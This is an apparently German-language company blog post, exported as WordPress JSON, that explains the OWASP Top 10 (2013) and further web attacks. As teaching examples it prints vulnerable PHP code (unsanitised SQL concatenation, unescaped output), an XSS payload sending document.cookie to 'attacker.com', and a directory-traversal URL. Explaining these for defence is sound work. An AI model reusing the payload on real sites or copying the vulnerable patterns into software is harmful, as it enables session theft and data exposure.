{"id":882,"date":"2015-07-22T14:45:45","date_gmt":"2015-07-22T14:45:45","guid":{"rendered":"https:\/\/anexia.com\/blog\/de\/?p=882"},"modified":"2022-04-19T13:56:34","modified_gmt":"2022-04-19T11:56:34","slug":"sicherheit-von-webapplikationen","status":"publish","type":"post","link":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/","title":{"rendered":"Sicherheit von Webapplikationen"},"content":{"rendered":"<p>Browser und das Internet sind in der heutigen Zeit allgegenw\u00e4rtig \u2013 ob am PC oder am Smartphone. Doch schon lange dienen sie nicht mehr ausschlie\u00dflich dem Ansehen von Websites.<!--more--><\/p>\n<p>Durch moderne Strategien und eine sehr aktive Entwicklung der letzten Jahre haben sich die Browser und auch das Internet selbst stark gewandelt. So geht aktuell der Trend dahin, immer mehr Softwarel\u00f6sungen aus dem Desktop-Bereich in vollwertige Webanwendungen umzuwandeln. Die Argumente hierf\u00fcr sind weitreichend \u2013 angefangen bei der einfachen dezentralen Bereitstellung bis hin zur vollst\u00e4ndigen Plattform- und Standortunabh\u00e4ngigkeit, sodass die Software auf praktisch jedem Endger\u00e4t jederzeit voll funktionsf\u00e4hig ist.<\/p>\n<p>Dennoch birgt dieser Trend ein gewisses Risiko \u2013 da nun die Software sowie auch alle deren Daten zentral gespeichert werden, erlangt der Sicherheitsaspekt nun einen neuen Level. SQL-Injection, Cross-Site-Scripting oder Session Hijacking sind hierbei g\u00e4ngige Begriffe. Doch worum es sich hierbei konkret handelt und welche Folgen daraus resultieren k\u00f6nnen, m\u00f6chte ich im Folgenden erkl\u00e4ren.<\/p>\n<p>Die Non-Profit-Organisation \u201e<a title=\"OWASP\" href=\"https:\/\/www.owasp.org\/\" target=\"_blank\" rel=\"noopener\">OWASP<\/a>\u201c (Open Web Application Security Project) hat sich das Ziel gesetzt, die Sicherheit von Anwendungen und Diensten im Internet zu verbessern. Sie m\u00f6chte f\u00fcr Sicherheit unter Ber\u00fccksichtigung der Beteiligten, der Abl\u00e4ufe und den Ausma\u00dfen der eingesetzten Technologie, sorgen. Hierzu werden auch regelm\u00e4\u00dfig Statistiken \u00fcber die h\u00e4ufigsten Sicherheitsl\u00fccken ver\u00f6ffentlicht. Die derzeit aktuellste stammt aus dem Jahr 2013.<\/p>\n<p><a href=\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-889 size-full\" src=\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit.jpg\" alt=\"ANEXIA_Blogbild_Sicherheit\" width=\"600\" height=\"225\" srcset=\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit.jpg 600w, https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit-325x122.jpg 325w, https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit-300x113.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<h2>Die Top 10 der Risiken (nach OWASP 2013)<\/h2>\n<h3>1. Injection<\/h3>\n<p>Als \u201eInjection\u201c bezeichnet man den Angriff, bei welchem durch Einschleusen von fremden Programmcode in die Anwendung versucht wird, diese lahmzulegen. Dies k\u00f6nnte beispielsweise \u00fcber die URL erfolgen. Wenn diese Daten serverseitig nicht validiert werden, und so z.B. direkt in ein SQL-Query \u00fcbernommen werden, stehen dem potentiellen Angreifer alle T\u00fcren offen.<\/p>\n<pre class=\"lang:php decode:true\">$sql = \"SELECT * FROM users WHERE id = '\" . $_GET['id'] . \"'\";<\/pre>\n<p>&nbsp;<\/p>\n<h3>2. Broken Authentication und Session Management<\/h3>\n<p>Darunter versteht man die unsachgem\u00e4\u00dfe Verwendung von sensiblen Daten zum Zweck der Benutzerauthentifizierung. Als Session bezeichnet man die stehende Verbindung eines Clients mit dem Server, gestartet und beendet durch das \u201eLogin\u201c und das \u201eLogout\u201c. Damit der Server die einzelnen Interaktionen mit den vielen parallelen Benutzern eindeutig identifizieren zu k\u00f6nnen, nutzt dieser jeweils eine eindeutige Kennung, die \u201eSession-ID\u201c. Aus sicherheitstechnischer Sicht sollte diese stets geheim gehalten werden, und auch nur der Software selbst intern bekannt sein.<\/p>\n<p>Hier w\u00e4re es beispielsweise m\u00f6glich, dass diese (geheime) Session-ID als Parameter der URL \u00fcbergeben wird. Doch gelangt eine dritte Person an diese (z.B. durch Mitsniffen des Netzwerkverkehrs), kann sich diese im Profil der eingeloggten Person navigieren, ohne jemals deren Anmeldedaten gekannt zu haben.<\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/sale\/payment?sessionId=123456789&amp;action=view<\/pre>\n<p>&nbsp;<\/p>\n<h3>3. Cross-Site-Scripting (XSS)<\/h3>\n<p>Unter dieser Bezeichnung verbergen sich zwei grunds\u00e4tzlich unterschiedliche Angriffe.<\/p>\n<p>Beim clientseitigen XSS versucht der Angreifer HTML-Code (oder auch von einer anderen clientseitigen Scriptsprache, z.B. Javascript) in eine Website einzuschleusen, welcher dann im Browser des Opfers ausgef\u00fchrt wird. Daraus k\u00f6nnte in weiterer Folge auch eine \u201eCross-Site Request Forgery\u201c eingeleitet werden.<\/p>\n<p>Beim serverseitigen XSS ist es prinzipiell gleich, jedoch steht hier statt dem Browser der Webserver im Mittelpunkt des Angriffs. Wird beispielsweise innerhalb der Software eine zus\u00e4tzliche Datei dynamisch geladen, k\u00f6nnte diese Schwachstelle gezielt dazu ausgenutzt werden, um eine nicht vorgesehene oder sogar eine eines anderen Servers auszuf\u00fchren.<\/p>\n<pre class=\"lang:php decode:true \">$str = '&lt;input tpe=\"text\" name=\"creditcard\" value=\"' . $_GET['creditcard_number'] . '\" \/&gt;';\r\necho $str;\r\n<\/pre>\n<p>Der Angreifer k\u00f6nnte so beispielsweise mit dem folgenden Beispiel sehr leicht eine Manipulation via Javascript durchf\u00fchren:<\/p>\n<pre class=\"lang:js decode:true\">\"&gt;&lt;script&gt;document.location= 'http:\/\/www.attacker.com\/cgi-bin\/cookie.cgi?foo=' + document.cookie&lt;\/script&gt;\"<\/pre>\n<p>Dadurch wird der Browser dahin bewegt, die Session-ID an den Angreifer zu \u00fcbermitteln, und sich so einen unbefugten Zugriff auf die Anwendung zu verschaffen (vgl. Punkt 2).<\/p>\n<p>&nbsp;<\/p>\n<h3>4. Unsichere direkte Objekt-Referenzen (Insecure Direct Object References)<\/h3>\n<p>Bei unsicheren Objekt-Referenzen versteht man die meist ungewollte Offenlegung von systemrelevanten oder benutzerbezogenen Daten. Meist wird diese Art des Angriffs zum Aussp\u00e4hen von Benutzerdaten genutzt \u2013 verursacht durch die nicht-authentifizierte Ausf\u00fchrung beispielsweise von SQL-Abfragen mit damit verbunden direkten Auslieferung des Ergebnisses.<\/p>\n<pre class=\"lang:java decode:true \">String sql = \"SELECT * FROM accounts WHERE account = ?\";\r\nPreparedStatement pstmt = connection.prepareStatement(sql, ...);\r\npstmt.setString(1, request.getParameter(\"account\"));\r\nResultSet results = pstmt.executeQuery();<\/pre>\n<p>Die Anfrage k\u00f6nnte beispielsweise so aussehen:<\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/account\/info?account=not_my_account<\/pre>\n<p>In diesem Beispiel kann ein Angreifer leicht herausfinden, ob ein bestimmtes Benutzerkonto existiert, oder nicht.<\/p>\n<p>&nbsp;<\/p>\n<h3>5. Sicherheitskritische Fehlkonfiguration (Security Misconfiguration)<\/h3>\n<p>F\u00fcr Serversoftware sowie die eingesetzte Komponenten werden stets Sicherheitsupdates in Form von Patches bereitgestellt. Doch leider werden diese nur allzu oft ignoriert \u2013 meist auch durch die Angst, die Funktion eines bestehenden Systems zu gef\u00e4hrden.<\/p>\n<p>Doch auch unn\u00f6tig aktive Dienste und offene Ports k\u00f6nnen ein Risiko darstellen.<\/p>\n<p>&nbsp;<\/p>\n<h3>6. Offenlegung sensibler Daten (Sensitive Data Exposure)<\/h3>\n<p>Dieser Punkt behandelt den Umgang mit sensiblen Daten und deren sicheren Verarbeitung. So reicht eine einfache Verschl\u00fcsselung auf Basis von Standard-Encoding- und Decoding-Funktionen in der Regel nicht aus, da man den scheinbar \u201esicheren\u201c Inhalt mit wenigen Tricks wieder entschl\u00fcsseln kann.<\/p>\n<p>Deshalb ist hier beispielsweise der Einsatz von \u00f6ffentlichen und privaten Schl\u00fcsseln von enormer Bedeutung. Wenn nun ein Angreifer an die sensiblen Daten gelangt, ist dies nun nur mehr halb so schlimm, solange das Schl\u00fcsselpaar, mit welchem die Daten verschl\u00fcsselt wurden, geheim bleibt. Je l\u00e4nger diese Schl\u00fcsselpaare sind, und umso mehr Sonderzeichen diese enthalten, desto schwieriger wird es, diese zu knacken.<\/p>\n<p>&nbsp;<\/p>\n<h3>7. Fehlende Zugriffskontrolle f\u00fcr Funktionen<\/h3>\n<p>Bei Systemen mit unterschiedlichen Zugriffsrechten, reicht es keinesfalls aus, die zu sch\u00fctzenden Bereiche einfach auszublenden. In den meisten F\u00e4llen reicht es schon aus, die entsprechende URL bzw. Parameter zu kennen.<\/p>\n<p>Deshalb wird es umso wichtiger die Benutzerinteraktionen serverseitig nochmals zu \u00fcberpr\u00fcfen, um unbefugte Zugriffe weitgehend ausschlie\u00dfen zu k\u00f6nnen. Diese \u00dcberpr\u00fcfungen m\u00fcssen dazu aber unabh\u00e4ngig von den gelieferten Informationen des Benutzers sein.<\/p>\n<p>Mehrstufige, voneinander unabh\u00e4ngige, Validierungen sind hierbei stets zu empfehlen. Beispielsweise reicht es nicht aus, nur zu \u00fcberpr\u00fcfen, ob ein Benutzer eingeloggt ist, und dann Funktionen einfach auszublenden \u2013 es muss auf jeden Fall auch Bezug auf die Benutzerrolle genommen werden, und so jene Bereiche, f\u00fcr welchen keine Berechtigung vorliegt, vollst\u00e4ndig abzuschotten.<\/p>\n<p>&nbsp;<\/p>\n<h3>8. Cross-Site-Request-Forgery (CSRF)<\/h3>\n<p>Beim CSRF wird eine bereits bestehende Session zwischen Server und Benutzer vorausgesetzt. Der Angreifer versucht hier aktiv den ahnungslosen Benutzer dazu zu bewegen, durch XSS manipulierte URLs aufzurufen.<\/p>\n<p>Im Gegensatz zum Session-Hijacking (genauere Erkl\u00e4rung weiter unten) spielt hier die Session-ID f\u00fcr den Angreifer keine Rolle.<\/p>\n<p>&nbsp;<\/p>\n<h3>9. Verwendung von Komponenten mit bekannten Schwachstellen<\/h3>\n<p>In der Theorie ist es leicht, herauszufinden, ob man eine aktuelle Komponente verwendet, oder eine mit bereits bekannten Schwachstellen oder Sicherheitsl\u00fccken.<\/p>\n<p>Doch in der Praxis sieht dies ganz anders aus \u2013 da die vielen Hersteller bzw. Entwickler teils nicht nachvollziehbare Versionsnummern vergeben, wird dies leider ganz schnell zur Herausforderung.<\/p>\n<p>Sinnvoll w\u00e4re es, regelm\u00e4\u00dfig auf Updates zu pr\u00fcfen und ggf. auch die Newsletter oder Announcements der Hersteller zu abonnieren.<\/p>\n<p>&nbsp;<\/p>\n<h3>10. Nicht validierte Um- und Weiterleitungen<\/h3>\n<p>Diese potentielle Schwachstelle entsteht, wenn Weiter- oder Umleitungsziele direkt \u00fcber die URL \u00fcbergeben werden. Um f\u00fcr Sicherheit zu sorgen, sollten diese \u00fcbergebenen URLs serverseitig nochmals \u00fcberpr\u00fcft werden, bevor die eigentliche Weiterleitung praktiziert wird. Besser und effektiver w\u00e4re es, hier nur IDs bzw. gleichwertig Schl\u00fcssel zu \u00fcbergeben, welche beispielsweise in einer Datenbank mit den entsprechenden Ziel-URLs hinterlegt werden.<\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/goto.php?url=danger.com<\/pre>\n<p>&nbsp;<\/p>\n<h2>Weitere Gefahren<\/h2>\n<p>Selbstverst\u00e4ndlich gibt es noch weitere Risiken und Angriffsm\u00f6glichkeiten. Nur weil diese nicht in der aktuellsten OWASP-Statistik gelistet sind, sollte man diese dennoch nicht untersch\u00e4tzen!<\/p>\n<p>&nbsp;<\/p>\n<h3>Session Hijacking<\/h3>\n<p>Da das HTTP-Protokoll zustandslos ist, muss die Applikation die Identifikation eines Benutzers selbst vornehmen. Dies geschieht \u00fcber die Session-ID.<\/p>\n<p>Beim Session Hijacking versucht der Angreifer mit einer \u201egestohlenen\u201c Session-ID die Identit\u00e4t eines fremden Benutzers vorzut\u00e4uschen, und so in dessen Namen zu innerhalb der Applikation zu agieren.<\/p>\n<p>&nbsp;<\/p>\n<h3>Directory Traversal<\/h3>\n<p>Bei dieser Methode versucht der Angreifer mit manipulierten Pfadangaben zu Ressourcen, an systemrelevante Daten zu gelangen.<\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/download.php?file=stuff.zip<\/pre>\n<p>Sofern hier keine weitere \u00dcberpr\u00fcfung mehr stattfindet, k\u00f6nnte man mit dem folgenden Beispiel statt dem unscheinbaren ZIP-Ordner ganze Konfigurationsdateien herunterladen:<\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/download.php?file=..\/..\/..\/config.php<\/pre>\n<p>&nbsp;<\/p>\n<h3>E-Mail-Injection<\/h3>\n<p>Dieses Problem tritt meist bei Kontaktformularen von Websites auf. Der Angreifer versucht in dieses Feld Schadcode einzuschleusen (vgl. XSS), sodass die Nachricht nicht nur an den Betreiber der Website, sondern an eine Vielzahl beliebiger Personen geht.<\/p>\n<p>Bekannt ist dieses Problem unter dem Begriff \u201eSpam\u201c.<\/p>\n<p>&nbsp;<\/p>\n<h3>Man-In-The-Middle-Attacke<\/h3>\n<p>Bei dieser Methode befindet sicher Angreifer, wie der Name bereits vermuten l\u00e4sst, direkt im Netzwerk des Benutzers. Dabei lenkt er Verbindungen, welche eigentlich den Zielserver betreffen sollten, geschickt \u00fcber seinen Computer um.<\/p>\n<p>Da nun der gesamte Netzwerkverkehr \u00fcber den Angreifer erfolgt, kann dieser leicht die Daten mitloggen bzw. manipulieren.<\/p>\n<p>Einzige Sicherheit bietet die Nutzung von verschl\u00fcsselten Verbindungen via SSL. Doch sollte es dem Angreifer gelingen, an diese Zertifikat zu gelangen, ist auch diese Ma\u00dfnahme zwecklos.<\/p>\n<p>&nbsp;<\/p>\n<h3>Denial of Service (DoS)<\/h3>\n<p>Bei einem DoS-Angriff versucht der Angreifer durch eine Vielzahl von parallelen Anfragen die Server so lange zu beanspruchen, bis diese der Last nicht mehr standhalten k\u00f6nnen und so nach und nach ausfallen.<\/p>\n<p>Eine Steigerung stellt hier der Distributed-DoS (DDoS) dar, bei welchem die Anfragen nicht von einem einzelnen Computer, sondern von vielen hunderten bis tausenden parallel stattfinden.<\/p>\n<p>&nbsp;<\/p>\n<h3>Phishing<\/h3>\n<p>Phishing z\u00e4hlt nicht unmittelbar zu den Problemen einer Webapplikation. Vielmehr versucht ein Angreifer durch den Versand von beispielsweise Massenmails mit Links zur Aufforderung der Eingabe bzw. Best\u00e4tigung von PINs oder TANs die Aufmerksamkeit des Opfers auf sich zu lenken.<\/p>\n<p>Klickt das Opfer dann diesen Link an, wird dieser nicht auf die vermeintlich originale Website, sondern eine optisch gleichwertige des Angreifers umgeleitet.<\/p>\n<p>Am h\u00e4ufigsten tritt dies in Bezug auf Online-Banking auf. Deshalb ist es umso wichtiger, stets auf die Domain und (sofern vorhanden) das SSL-Zertifikat (erkennbar am HTTPS) zu achten.<\/p>\n<p>Seri\u00f6se Unternehmen werden niemals nach solchen Daten fragen \u2013 und schon gar nicht per E-Mail!<\/p>\n<p>&nbsp;<\/p>\n<h2>Fazit<\/h2>\n<p>Das Angebot von Angriffsm\u00f6glicheiten ist enorm \u2013 umso wichtiger ist es, bereits in der Entwicklungsphase besonders auf solche Schwachstellen zu achten, um so sp\u00e4ter Probleme vermeiden zu k\u00f6nnen.<\/p>\n<p>Die Angreifer sind stets bem\u00fcht, Sicherheits\u00fcberpr\u00fcfungen zu umgehen bzw. auszutricksen, um so an sensible Daten zu gelangen und daraus resultierend einen enormen (finanziellen) Schaden hervorzurufen.<\/p>\n<p>Leider ist es so, dass eine Software nie zu 100 Prozent sicher sein wird, man kann nur die Sicherheitsstandards entsprechend erh\u00f6hen, um es Angreifern wesentlich schwieriger zu machen.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Webapplikationen bergen ein gewisses Risiko. Worum es sich hierbei handelt und welche Folgen daraus resultieren k\u00f6nnen, m\u00f6chte ich im Folgenden erkl\u00e4ren.<\/p>\n","protected":false},"author":15,"featured_media":515,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[165,167,171,170,168,164,14,172,65,169,163,64,362,162,166],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Sicherheit von Webapplikationen - ANEXIA Blog<\/title>\n<meta name=\"description\" content=\"Webapplikationen bergen ein gewisses Risiko. Worum es sich hierbei handelt und welche Folgen daraus resultieren k\u00f6nnen, m\u00f6chte ich im Folgenden erkl\u00e4ren.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sicherheit von Webapplikationen - ANEXIA Blog\" \/>\n<meta property=\"og:description\" content=\"Webapplikationen bergen ein gewisses Risiko. Worum es sich hierbei handelt und welche Folgen daraus resultieren k\u00f6nnen, m\u00f6chte ich im Folgenden erkl\u00e4ren.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/\" \/>\n<meta property=\"og:site_name\" content=\"ANEXIA Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/anexiagmbh\/\" \/>\n<meta property=\"article:published_time\" content=\"2015-07-22T14:45:45+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-04-19T11:56:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"1067\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Manuel Wutte\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@_ANEXIA\" \/>\n<meta name=\"twitter:site\" content=\"@_ANEXIA\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Manuel Wutte\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"9\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/\",\"url\":\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/\",\"name\":\"Sicherheit von Webapplikationen - ANEXIA Blog\",\"isPartOf\":{\"@id\":\"https:\/\/anexia.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg\",\"datePublished\":\"2015-07-22T14:45:45+00:00\",\"dateModified\":\"2022-04-19T11:56:34+00:00\",\"author\":{\"@id\":\"https:\/\/anexia.com\/blog\/#\/schema\/person\/926f6b9e5aeed88b145cf86d87fd09de\"},\"description\":\"Webapplikationen bergen ein gewisses Risiko. Worum es sich hierbei handelt und welche Folgen daraus resultieren k\u00f6nnen, m\u00f6chte ich im Folgenden erkl\u00e4ren.\",\"breadcrumb\":{\"@id\":\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#primaryimage\",\"url\":\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg\",\"contentUrl\":\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg\",\"width\":1600,\"height\":1067},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/anexia.com\/blog\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sicherheit von Webapplikationen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/anexia.com\/blog\/#website\",\"url\":\"https:\/\/anexia.com\/blog\/\",\"name\":\"ANEXIA Blog\",\"description\":\"[:de] ANEXIA Blog - Technischen Themen, Anexia News und Insights [:]\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/anexia.com\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/anexia.com\/blog\/#\/schema\/person\/926f6b9e5aeed88b145cf86d87fd09de\",\"name\":\"Manuel Wutte\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/anexia.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9528a61f48f4294cd5f7cd8a4141bd55?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9528a61f48f4294cd5f7cd8a4141bd55?s=96&d=mm&r=g\",\"caption\":\"Manuel Wutte\"},\"url\":\"https:\/\/anexia.com\/blog\/author\/mwu\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sicherheit von Webapplikationen - ANEXIA Blog","description":"Webapplikationen bergen ein gewisses Risiko. Worum es sich hierbei handelt und welche Folgen daraus resultieren k\u00f6nnen, m\u00f6chte ich im Folgenden erkl\u00e4ren.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/","og_locale":"de_DE","og_type":"article","og_title":"Sicherheit von Webapplikationen - ANEXIA Blog","og_description":"Webapplikationen bergen ein gewisses Risiko. Worum es sich hierbei handelt und welche Folgen daraus resultieren k\u00f6nnen, m\u00f6chte ich im Folgenden erkl\u00e4ren.","og_url":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/","og_site_name":"ANEXIA Blog","article_publisher":"https:\/\/www.facebook.com\/anexiagmbh\/","article_published_time":"2015-07-22T14:45:45+00:00","article_modified_time":"2022-04-19T11:56:34+00:00","og_image":[{"width":1600,"height":1067,"url":"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg","type":"image\/jpeg"}],"author":"Manuel Wutte","twitter_card":"summary_large_image","twitter_creator":"@_ANEXIA","twitter_site":"@_ANEXIA","twitter_misc":{"Verfasst von":"Manuel Wutte","Gesch\u00e4tzte Lesezeit":"9\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/","url":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/","name":"Sicherheit von Webapplikationen - ANEXIA Blog","isPartOf":{"@id":"https:\/\/anexia.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#primaryimage"},"image":{"@id":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#primaryimage"},"thumbnailUrl":"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg","datePublished":"2015-07-22T14:45:45+00:00","dateModified":"2022-04-19T11:56:34+00:00","author":{"@id":"https:\/\/anexia.com\/blog\/#\/schema\/person\/926f6b9e5aeed88b145cf86d87fd09de"},"description":"Webapplikationen bergen ein gewisses Risiko. Worum es sich hierbei handelt und welche Folgen daraus resultieren k\u00f6nnen, m\u00f6chte ich im Folgenden erkl\u00e4ren.","breadcrumb":{"@id":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#primaryimage","url":"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg","contentUrl":"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg","width":1600,"height":1067},{"@type":"BreadcrumbList","@id":"https:\/\/anexia.com\/blog\/de\/sicherheit-von-webapplikationen\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/anexia.com\/blog\/de\/"},{"@type":"ListItem","position":2,"name":"Sicherheit von Webapplikationen"}]},{"@type":"WebSite","@id":"https:\/\/anexia.com\/blog\/#website","url":"https:\/\/anexia.com\/blog\/","name":"ANEXIA Blog","description":"[:de] ANEXIA Blog - Technischen Themen, Anexia News und Insights [:]","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/anexia.com\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/anexia.com\/blog\/#\/schema\/person\/926f6b9e5aeed88b145cf86d87fd09de","name":"Manuel Wutte","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/anexia.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9528a61f48f4294cd5f7cd8a4141bd55?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9528a61f48f4294cd5f7cd8a4141bd55?s=96&d=mm&r=g","caption":"Manuel Wutte"},"url":"https:\/\/anexia.com\/blog\/author\/mwu\/"}]}},"lang":"de","translations":{"de":882,"en":6994},"amp_enabled":true,"pll_sync_post":[],"_links":{"self":[{"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/posts\/882"}],"collection":[{"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/comments?post=882"}],"version-history":[{"count":12,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/posts\/882\/revisions"}],"predecessor-version":[{"id":6996,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/posts\/882\/revisions\/6996"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/media\/515"}],"wp:attachment":[{"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/media?parent=882"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/categories?post=882"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/tags?post=882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}